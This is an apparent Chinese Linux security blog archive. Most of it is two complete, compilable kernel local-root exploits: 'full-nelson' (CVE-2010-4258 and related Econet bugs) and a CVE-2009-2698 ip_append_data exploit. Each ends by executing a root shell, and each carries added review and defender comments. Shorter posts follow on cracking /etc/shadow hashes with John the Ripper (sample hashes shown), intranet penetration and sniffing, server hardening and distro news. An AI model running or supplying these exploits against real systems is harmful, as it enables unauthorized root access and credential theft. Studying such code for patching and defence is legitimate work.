

Exploits Linux Kernel <= 2.6.37 local privilege escalation

2010年12月16日 没有评论 370 views

/*

* Linux Kernel <= 2.6.37 local privilege escalation

* by Dan Rosenberg

* @djrbliss on twitter

*

* Usage:

* gcc full-nelson.c -o full-nelson

* ./full-nelson

*

* This exploit leverages three vulnerabilities to get root, all of which were

* discovered by Nelson Elhage:

*

* CVE-2010-4258

* -------------

* This is the interesting one, and the reason I wrote this exploit. If a

* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL

* word will be written to a user-specified pointer when that thread exits.

* This write is done using put_user(), which ensures the provided destination

* resides in valid userspace by invoking access_ok(). However, Nelson

* discovered that when the kernel performs an address limit override via

* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,

* etc.), this override is not reverted before calling put_user() in the exit

* path, allowing a user to write a NULL word to an arbitrary kernel address.

* Note that this issue requires an additional vulnerability to trigger.

*

* CVE-2010-3849

* -------------

* This is a NULL pointer dereference in the Econet protocol. By itself, it's

* fairly benign as a local denial-of-service. It's a perfect candidate to

* trigger the above issue, since it's reachable via sock_no_sendpage(), which

* subsequently calls sendmsg under KERNEL_DS.

*

* CVE-2010-3850

* -------------

* I wouldn't be able to reach the NULL pointer dereference and trigger the

* OOPS if users weren't able to assign Econet addresses to arbitrary

* interfaces due to a missing capabilities check.

*

* In the interest of public safety, this exploit was specifically designed to

* be limited:

*

* * The particular symbols I resolve are not exported on Slackware or Debian

* * Red Hat does not support Econet by default

* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and

* Debian

*

* However, the important issue, CVE-2010-4258, affects everyone, and it would

* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly

* more sophisticated version of this that doesn't have the roadblocks I put in

* to prevent abuse by script kiddies.

*

* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.

*

* NOTE: the exploit process will deadlock and stay in a zombie state after you

* exit your root shell because the Econet thread OOPSes while holding the

* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.

*

* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla

*/

#include <stdio.h>

#include <sys/socket.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <string.h>

#include <net/if.h>

#include <sched.h>

#include <stdlib.h>

#include <signal.h>

#include <sys/utsname.h>

#include <sys/mman.h>

#include <unistd.h>

/* How many bytes should we clear in our

* function pointer to put it into userspace? */

/* SHIFT is the number of high-order bits stripped from a kernel function
 * pointer (main() computes landing = econet_ioctl << SHIFT >> SHIFT);
 * OFFSET is how many bytes below a pointer slot main() aims the NULL write.
 * SHIFT == OFFSET * 8 on both architectures: on little-endian x86 the OFFSET
 * bytes just below a slot are the high-order bytes of the pointer stored in
 * the previous slot, i.e. exactly the bits the shift discards. */
#ifdef __x86_64__
#define SHIFT 24    /* keep the low 40 bits of a 64-bit pointer */
#define OFFSET 3
#else
#define SHIFT 8     /* keep the low 24 bits of a 32-bit pointer */
#define OFFSET 1
#endif

/* thanks spender... */

/*
 * Resolve a kernel symbol to its address by name, as an unprivileged user.
 *
 * Sources, tried in order:
 *   1. /proc/kallsyms   ("addr type name" lines)
 *   2. /proc/ksyms      (old two-column "addr name" format; oldstyle = 1)
 *   3. /boot/System.map-<uname release>  (rep = 1; a release that does not
 *      start with "2.6" is parsed as the two-column format)
 *
 * @param name  symbol to look up (exact strcmp match)
 * @return      the address, or 0 if the symbol is not found or no source is
 *              readable.  main() treats 0 as a failure.
 *
 * Defender's note: this depends entirely on kernel addresses being readable
 * by unprivileged users.  With the kptr_restrict sysctl enabled, the
 * addresses in /proc/kallsyms read as 0, so a match would be reported as
 * "not found" here; making /boot/System.map-* root-only closes the fallback.
 */
unsigned long get_kernel_sym(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;           /* symbol-type column of /proc/kallsyms */
    char sname[512];      /* symbol name; reused below for the System.map path */
    struct utsname ver;
    int ret;
    int rep = 0;          /* 1 once we are on the System.map fallback */
    int oldstyle = 0;     /* 1 for the two-column "addr name" format */

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }

repeat:
    ret = 0;
    while (ret != EOF) {
        /* NOTE(review): %s carries no width limit, so a symbol name of 512
         * or more characters would overflow sname; nothing enforces the
         * bound here. */
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                /* skip bookkeeping entries (names containing "_O/" or "_S.") */
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                /* strip a trailing "..._<x>smp_<suffix>" versioned-symbol
                 * tail, together with the underscores preceding it */
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            /* nothing parsed at this position: consume one token and retry */
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
            fclose(f);
            return addr;
        }
    }
    fclose(f);
    if (rep)
        return 0;   /* System.map was the last resort */

fallback:
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;
    /* sname (512 bytes) comfortably holds the prefix plus the fixed-size
     * utsname release field */
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
        return 0;
    rep = 1;
    goto repeat;
}

/* Kernel functions reached from the payload; their addresses are filled in
 * by main() from get_kernel_sym().  regparm(3) selects the register calling
 * convention the 32-bit kernel is built with; on x86-64 the attribute should
 * be a no-op since the ABI already passes the argument in a register. */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;                 /* set in main() */
_prepare_kernel_cred prepare_kernel_cred;   /* set in main() */

/* Payload body, executed in kernel context once the clobbered econet_ops
 * entry is called (see main()).  prepare_kernel_cred(0) builds a fresh root
 * credential set and commit_creds() installs it on the calling task — the
 * well-known two-call privilege-escalation primitive.  The two parameters
 * are unused; their names look inherited from an mmap-style payload and do
 * not matter here.  Returning -1 surfaces as an error from the user-side
 * ioctl(), which is harmless because main() checks getuid() instead.
 *
 * Defender's note: executing a userspace-mapped page from ring 0, as this
 * whole design requires, is what SMEP blocks on CPUs that support it. */
static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

/* Why do I do this? Because on x86-64, the address of

* commit_creds and prepare_kernel_cred are loaded relative

* to rip, which means I can't just copy the above payload

* into my landing area. */

/*
 * The bytes of this function (1024 bytes starting at &trampoline, see
 * main()) are copied to the userspace "landing" page whose address is
 * econet_ioctl with its high bits cleared.  Instead of a direct call, the
 * copy loads getroot's absolute address into a register and calls through
 * it back into the original binary, so the copied bytes work regardless of
 * where they were copied to.  `mov $getroot` needs that address fixed at
 * link time, which presumably assumes a non-PIE build (the header's plain
 * gcc invocation).  Declared with the same regparm attribute as getroot.
 */
void __attribute__((regparm(3)))
trampoline()
{
#ifdef __x86_64__
    asm("mov $getroot, %rax; call *%rax;");
#else
    asm("mov $getroot, %eax; call *%eax;");
#endif
}

/* Triggers a NULL pointer dereference in econet_sendmsg

* via sock_no_sendpage, so it's under KERNEL_DS */

/*
 * Child-thread entry point (started by clone() in main()).
 *
 * @param fildes  the four descriptors main() opened: [0]/[1] pipe read and
 *                write ends, [2] the PF_ECONET socket, [3] /dev/zero
 * @return -1 if the Econet address could not be assigned; otherwise the
 *         thread is expected to die in the kernel OOPS and never return.
 *
 * Step 1 (CVE-2010-3850, per the header): SIOCSIFADDR on the Econet socket
 * assigns an Econet address to the interface named "eth0".  The name is
 * hard-coded, so this fails on hosts whose interface is called anything
 * else.
 * Step 2 (CVE-2010-3849, per the header): splice /dev/zero into the pipe,
 * then the pipe into the socket.  The header states the second splice goes
 * through sock_no_sendpage() and calls sendmsg under KERNEL_DS, where
 * econet_sendmsg dereferences NULL.  The OOPS kills this thread with the
 * override still in force, and on exit CLONE_CHILD_CLEARTID writes a NULL
 * word to the ctid pointer main() supplied (CVE-2010-4258).
 * Both splice() return values are ignored: on a patched kernel the calls
 * simply return and the child terminates via exit(0).
 *
 * Defender's note: none of this is reachable unless the Econet protocol is
 * available (CONFIG_ECONET / the econet module); keeping it disabled, or
 * running a kernel with the three fixes, stops the trigger.
 */
int trigger(int * fildes)
{
    int ret;
    struct ifreq ifr;

    memset(&ifr, 0, sizeof(ifr));
    /* strncpy with IFNAMSIZ is fine here: "eth0" is far shorter than the
     * field and the memset above guarantees NUL termination */
    strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

    ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
    if (ret < 0) {
        printf("[*] Failed to set Econet address.\n");
        return -1;
    }

    splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
    splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

    /* Shouldn't get here... */
    exit(0);
}

/*
 * Entry point.  Sequence:
 *   1. open the pipe, the PF_ECONET socket and /dev/zero (shared with the
 *      child, see the comment below);
 *   2. resolve econet_ioctl, econet_ops, commit_creds and
 *      prepare_kernel_cred through get_kernel_sym();
 *   3. map a userspace page at econet_ioctl's address with its high bits
 *      cleared and copy trampoline there;
 *   4. clone() the trigger thread with CLONE_CHILD_CLEARTID pointing at
 *      `target`, OFFSET bytes below the 11th slot of econet_ops, so the
 *      NULL word the kernel writes on thread exit clears the high-order
 *      bytes of the preceding slot (presumably the ioctl entry);
 *   5. call ioctl() on the Econet socket: the truncated pointer now points
 *      into the userspace copy of trampoline, which runs getroot;
 *   6. check getuid() and exec a shell.
 *
 * @return -1 on any failure; does not return on success (execl replaces the
 *         process).  If execl fails the function falls off the end, which
 *         C99 treats as return 0, without reporting the error.
 *
 * Defender's note: an unprivileged user needs readable symbol addresses
 * (kptr_restrict / System.map permissions), an available Econet protocol
 * (CONFIG_ECONET) and a CPU/kernel that lets ring 0 execute userspace pages
 * (SMEP).  Removing any one of them stops this binary.
 */
int main(int argc, char * argv[])
{
    unsigned long econet_ops, econet_ioctl, target, landing;
    int fildes[4], pid;          /* pid is never assigned or used */
    void * newstack, * payload;

    /* Create file descriptors now so there are two
       references to them after cloning...otherwise
       the child will never return because it
       deadlocks when trying to unlock various
       mutexes after OOPSing */
    /* NOTE(review): pipe()'s return is unchecked; if it fails, fildes[0]
     * and fildes[1] are read uninitialised by the test below */
    pipe(fildes);
    fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
    fildes[3] = open("/dev/zero", O_RDONLY);
    if (fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {
        printf("[*] Failed to open file descriptors.\n");
        return -1;
    }

    /* Resolve addresses of relevant symbols */
    printf("[*] Resolving kernel addresses...\n");
    econet_ioctl = get_kernel_sym("econet_ioctl");
    econet_ops = get_kernel_sym("econet_ops");
    commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");
    if (!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
        printf("[*] Failed to resolve kernel symbols.\n");
        return -1;
    }

    /* 64 KiB heap block used as the clone()d child's stack; the child is
     * handed its top end (newstack + 65536) since the stack grows down */
    if (!(newstack = malloc(65536))) {
        printf("[*] Failed to allocate memory.\n");
        return -1;
    }

    printf("[*] Calculating target...\n");
    /* OFFSET bytes below slot 10 of econet_ops: a word of zeros written
     * here covers the last OFFSET bytes of slot 9 and the first bytes of
     * slot 10 */
    target = econet_ops + 10 * sizeof(void *) - OFFSET;

    /* Clear the higher bits */
    /* the same truncation the NULL write applies to the kernel pointer, so
     * the clobbered pointer and this landing address coincide */
    landing = econet_ioctl << SHIFT >> SHIFT;

    /* two pages fixed at the page containing landing, RWX so the copied
     * trampoline can execute; MAP_FIXED silently replaces any mapping
     * already there */
    payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
                   PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
    if ((long)payload == -1) {
        printf("[*] Failed to mmap() at target address.\n");
        return -1;
    }

    /* copies trampoline plus whatever follows it in .text, 1024 bytes in
     * total; the second mapped page presumably keeps the copy inside mapped
     * memory when landing sits near the end of the first page */
    memcpy((void *)landing, &trampoline, 1024);

    /* the child shares the address space; ctid = target arms the
     * CLONE_CHILD_CLEARTID write that trigger() turns into a kernel-mode
     * NULL write.  The returned child pid is discarded. */
    clone((int (*)(void *))trigger,
          (void *)((unsigned long)newstack + 65536),
          CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
          &fildes, NULL, NULL, target);

    /* NOTE(review): a fixed delay instead of synchronising with the child;
     * on a slow or loaded machine the ioctl below can run before the
     * pointer has been clobbered */
    sleep(1);

    printf("[*] Triggering payload...\n");
    /* request 0 / arg NULL: any request reaches the hijacked entry */
    ioctl(fildes[2], 0, NULL);

    if (getuid()) {
        printf("[*] Exploit failed to get root.\n");
        return -1;
    }

    printf("[*] Got root!\n");
    execl("/bin/sh", "/bin/sh", NULL);
}


Linux下压力测试综合对比

2010年6月13日 没有评论 331 views

一、http_load

http_load以并行复用的方式运行,用以测试web服务器的吞吐量与负载。但是它不同于大多数压力测试工具,它可以以一个单一的进程运行,一般不会把客户机搞死。还可以测试HTTPS类的网站请求。
#wget http://www.acme.com/software/http_load/http_load-12mar2006.tar.gz
#tar zxvf http_load-12mar2006.tar.gz
#cd http_load-12mar2006
#make && make install
#http_load -p并发访问进程数 -f总计的访问次数 -r每秒的访问频率 -s访问时间  需要访问的url文件
#echo "http://192.168.1.101/test.php" >1.txt
#http_load -p 30 -s 60 1.txt
7751 fetches, 30 max parallel, 2.9119e+08 bytes, in 60.0024 seconds
37568 mean bytes/connection
129.178 fetches/sec, 4.85297e+06 bytes/sec
msecs/connect: 77.8017 mean, 3050.89 max, 30.308 min
msecs/first-response: 50.3716 mean, 9148.3 max, 31.205 min
HTTP response codes:code 200 -- 7751                说明打开响应页面的类型

http://www.acme.com/software这个网站上有很多小工具:http_ping、http_get、http_post

还有一个secure HTTP server:thttpd

二、webbench


Linux下渗透嗅探术

2009年12月14日 1 条评论 254 views

内网渗透在攻击层面,其实更趋向于社工和常规漏洞检测的结合,为了了解网内防护措施的设置是通过一步步的刺探和经验积累,有时判断出错,也能进入误区。但是如果能在网内进行嗅探,则能事半功倍,处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破,到控制整个内网的全过程来跟大家讨论,内网的渗透嗅探术和安全防护一些内容。

在寻找突破时,更多的是从应用服务来,而应用服务最直观的信息采集,就是端口扫描,不同的应用,开放的服务不一样。所以,在对网络进行信息收集时,大概分为这样两步: 端口探测,程序指纹分析。在端口探测方面,个人喜欢用SuperScan来快速对网段里的应用进行判断,如图:

内网渗透嗅探术

在掌握端口信息后,就要对服务应用程序的指纹进行分析,主要包括版本号、已知的漏洞信息、常规配置信息、针对此应用流行的攻击方法等。本文试着对网内一台提供WEB服务的主机作为突破口,提交一个畸形的请求,如图:



Linux网络安全经验之谈

2009年10月15日 1 条评论 150 views

关于分区

一个潜在的黑客如果要攻击你的Linux服务器,他首先就会尝试缓冲区溢出。在过去的几年中,以缓冲区溢出为类型的安全漏洞是最为常见的一种形式了。更为严重的是,缓冲区溢出漏洞占了远程网络攻击的绝大多数,这种攻击可以轻易使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权!

为了防止此类攻击,我们从安装系统时就应该注意。如果用root分区纪录数据,如log文件和email,就可能因为拒绝服务产生大量日志或垃圾邮件,从而导致系统崩溃。所以建议为/var开辟单独的分区,用来存放日志和邮件,以避免root分区被溢出。最好为特殊的应用程序单独开一个分区,特别是可以产生大量日志的程序,还有建议为/home单独分一个区,这样他们就不能填满/分区了,从而就避免了部分针对Linux分区溢出的恶意攻击。

关于BIOS

记着要在BIOS设置中设定一个BIOS密码,不接收软盘启动。这样可以阻止不怀好意的人用专门的启动盘启动你的Linux系统,并避免别人更改BIOS设置,如更改软盘启动设置或不弹出密码框直接启动服务器等等。

关于口令

口令是系统中认证用户的主要手段,系统安装时默认的口令最小长度通常为5,但为保证口令不易被猜测攻击,可增加口令的最小长度,至少等于8。为此,需修改文件/etc/login.defs中参数PASS_MIN_LEN(口令最小长度)。同时应限制口令使用时间,保证定期更换口令,建议修改参数PASS_MIN_DAYS(口令使用时间)。


用iptables来防止web服务器被CC攻击

2009年9月6日 没有评论 147 views

当apache站点受到严重的cc攻击,我们可以用iptables来防止web服务器被CC攻击,实现自动屏蔽IP的功能。

1.系统要求

(1)LINUX 内核版本:2.6.9-42ELsmp或2.6.9-55ELsmp(其它内核版本需要重新编译内核,比较麻烦,但是也是可以实现的)。

(2)iptables版本:1.3.7

2. 安装

安装iptables1.3.7和系统内核版本对应的内核模块kernel-smp-modules-connlimit

3. 配置相应的iptables规则

示例如下:


Redhat Linux环境下编译安装John

2009年9月2日 1 条评论 147 views

来源:iCNPunk

安装GCC编译环境:

[root@localhost run]# yum install gcc

http://www.openwall.com/john/下载适合自己的编译包,我选择的是稳定版:

[root@localhost run]# wget http://www.openwall.com/john/f/john-1.7.0.2.tar.gz


Join破解Linux密码

2009年9月1日 没有评论 148 views

来源:iCNPunk

测试环境,RHEL5系统,系统root帐户一个,自建帐户icnpunk一个。

[root@localhost run]# ./unshadow /etc/passwd /etc/shadow > /tmp/passwd

[root@localhost run]# vim /tmp/passwd
删除没有用的行,只剩下需要破解的账号:

root:$1$aUXH7Z3Y$fec8RLXoAkEdn41UmvMYj.:0:0:root:/root:/bin/bash
icnpunk:$1$CmzD3ab0$qp.JmpXa8d3IIBYrltWDb/:500:500::/home/icnpunk:/bin/bash



Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit

2009年9月1日 没有评论 110 views

漏洞利用程序:

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by
.
**
*/



#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

/* Real uid/gid of the invoking user, captured in main().  uid is the value
 * get_root_uid() searches for; gid is assigned but never read. */
unsigned int uid, gid;
/*
 * Runs in ring 0 (called from the kernel_code asm stub).  Starting at the
 * task pointer it was handed, scans forward one word at a time until it
 * finds four consecutive words equal to the caller's uid — presumably the
 * uid/euid/suid/fsuid fields — and zeroes them and the four words that
 * follow (presumably the matching gid fields), turning the current task
 * into root.
 *
 * The scan has no upper bound: if the pattern is absent (different field
 * layout, or a kernel that keeps credentials outside the task structure)
 * it walks off into arbitrary kernel memory and eventually faults in
 * kernel mode.  No locking; the fields are written in place.
 */
void get_root_uid(unsigned *task)
{
	unsigned *addr=task;
	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
		addr++;
	}
	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	return;
}
/* Matches the `exploit` label inside kernel_code's asm; nothing in this
 * file calls it — control enters through the `kernel` pointer instead. */
void exploit();
/*
 * Ring-0 stub reached through the indirect jump main() plants at address 0.
 * It recovers the current task pointer the classic x86-32 way: with a
 * 4 KiB, page-aligned kernel stack (hence the 0xfffff000 mask) thread_info
 * sits at the stack base and its first word is the task_struct pointer.
 * That pointer is pushed as the single (cdecl) argument to get_root_uid(),
 * the argument is popped and eax restored, and the function's normal
 * epilogue presumably returns into the kernel caller.
 * The `exploit` label is local to this asm block; the `kernel` variable
 * below points at the function itself.
 */
void kernel_code()
{
	asm("exploit:\n"
		"push %eax\n"
		"movl $0xfffff000,%eax\n"
		"andl %esp,%eax\n"
		"pushl (%eax)\n"
		"call get_root_uid\n"
		"addl $4,%esp\n"
		"popl %eax\n");
	return;
}
/* Address the page-zero stub jumps through (the ff 25 <&kernel> bytes
 * main() writes at offset 5). */
void *kernel=kernel_code;

/*
 * Entry point: plants a tiny stub at virtual address 0, provokes the
 * ip_append_data() NULL dereference named in the header, and spawns a
 * shell if the uid changed.
 *
 * @return -1 on failure (already root, no page-zero mapping, socket error,
 *         uid unchanged); 0 only if execl fails.
 *
 * Page zero: personality(0xffffffff) queries the current personality
 * without changing it.  Under PER_SVR4 the page at 0 is presumably already
 * mapped by the loader and is only made RWX; otherwise it is mapped with
 * MAP_FIXED.  zero_page is assigned but never read.
 *
 * Defender's note: the vm.mmap_min_addr sysctl is exactly the mitigation
 * for this class of NULL-dereference exploit — it refuses the mmap() at 0
 * for unprivileged users, and the program then stops at "[-] mmap()".
 */
int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,"[-] check ur uid\n");
		return -1;
	}
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror("[-] mprotect()");
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror("[-] mmap()");
			return -1;
	}
	/* Stub at address 0, byte by byte:
	 *   0..4   90 x5     nop sled
	 *   5..6   ff 25     jmp *disp32 (absolute indirect) ...
	 *   7..10  &kernel   ... through the `kernel` variable
	 *   11     c3        ret (not reached via the jmp)
	 * When the kernel calls the NULL function pointer it lands here and
	 * continues in kernel_code(). */
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* +1 */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror("[-] socket()");
		return -1;
	}
	/* AF_UNSPEC destination with 0x82-filled address bytes and a zeroed
	 * 1024-byte payload; a sendto() with MSG_MORE followed by one without
	 * is, per the header, what reaches the NULL dereference — the exact
	 * kernel path is not visible here.  Neither return value is checked. */
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	if(getuid()==uid){
		printf("[-] exploit failed, try again\n");
		return -1;
	}
	close(fd);
	execl("/bin/sh","sh","-i",NULL);
	return 0;
}

/* eoc */

Magic Linux 2.5 Beta 2 放出

2009年8月28日 没有评论 61 views

新闻来源:LinuxToy
在跳票一个星期后,Magic Linux开发团队放出了 Magic Linux 2.5 的第二个 Beta 版本以供用户测试。Magic Linux 2.5 Beta 2 包含 Kernel 2.6.30.5、Glibc 2.10.1、GCC 4.4.0、X.Org 1.6.3、KDE 4.3.0 等主要组件。根据 Magic Linux 2.5 Beta 2 发布公告显示,该版本除了对系统软件和仓库进行更新之外,还修正了安装程序在有读卡器的机器上无法启动、Java 中文字体配置、Fcitx 不能启动、仓库配置、Phonon 声卡独占、Konsole 字体显示、Strigi 和 Nepomukserver 在关闭桌面搜索时仍然启动、K 帮助中心左侧树形索引中文乱码等多个问题。


Slackware Linux 13.0 正式发布

2009年8月28日 没有评论 72 views

新闻来源:LinuxToy
Slackware Linux 这个老牌的 Linux 发行版在今天推出了 13.0 正式版本。新版本不仅对重要组件进行了升级,而且增加了新的 .txz 包格式。
Slackware Linux 12.2 以来,该版本主要包含以下更新:

  • 完全重制了 X 包集
  • 对桌面环境进行了升级,含 KDE 4.2.4 和 Xfce 4.6.1
  • 新的具有更好压缩功能的 .txz 包格式
  • 对开发系统、网络服务、库、以及应用程序进行了升级



一个命令可以攻击所有Linux系统

2009年8月16日 没有评论 169 views

在微软本月月经日(8.11)的同一天,国外黑客taviso和julien公开了可以攻击所有新旧Linux系统的一个漏洞,包括但不限于 RedHat,CentOS,Suse,Debian,Ubuntu,Slackware,Mandriva,Gentoo及其衍生系统。黑客只需要执行一个命令,就可以通过此漏洞获得root权限,即使开启了SELinux也于事无补。攻击这个漏洞到底有多简单,下面我们看图说话,有图有真相。


来自雨林木风的Linux发行版: Ylmf Linux

2009年7月24日 没有评论 96 views

雨林木风以前是制作Windows系统安装光盘的组织,在MS反盗版的作用下,雨林木风已经转战Linux阵营,并在近期推出了基于Fedora 11的、中文友好的Linux发行版:Ylmf Linux!
